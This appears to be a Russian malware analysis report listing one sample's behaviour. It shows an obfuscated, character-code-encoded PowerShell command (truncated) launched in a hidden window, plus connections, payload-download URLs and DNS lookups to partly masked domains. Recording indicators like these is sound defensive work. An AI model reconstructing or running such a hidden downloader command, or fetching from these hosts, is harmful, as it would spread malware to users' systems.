Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JOiN ( '14k67C120>102%23>68,79C93C7L69>72!64!79%73>94C10D100m79L94L4,125L79%72m105C70>67m79>68!94D17p14k68p91D92C23D13p66C94p94D90%16>5p5>90>95m70p89k79p4C72p77D5,28,114m97%28C99!30k111p67!71%...
- 'pu##e.bg':80
- 'pu##e.bg':443
- 'la###ttour.com':80
- 'hu###omains.com':443
- 'zo###tudio.com':80
- http://pu##e.bg/6XK6I4Eim/
- http://www.la###ttour.com/IWNmtIfg/
- http://www.zo###tudio.com/E4MPAsxgdj/
- 'pu##e.bg':443
- 'hu###omains.com':443
- DNS ASK pu##e.bg
- DNS ASK sr###ndia.in
- DNS ASK la###ttour.com
- DNS ASK hu###omains.com
- DNS ASK du#####ctrang.edu.vn
- DNS ASK zo###tudio.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JOiN ( '14k67C120>102%23>68,79C93C7L69>72!64!79%73>94C10D100m79L94L4,125L79%72m105C70>67m79>68!94D17p14k68p91D92C23D13p66C94p94D90%16>5p5>90>95m70p89k79p4C72p77D5,28,114m97%28C99!30k111p67!71%...' (со скрытым окном)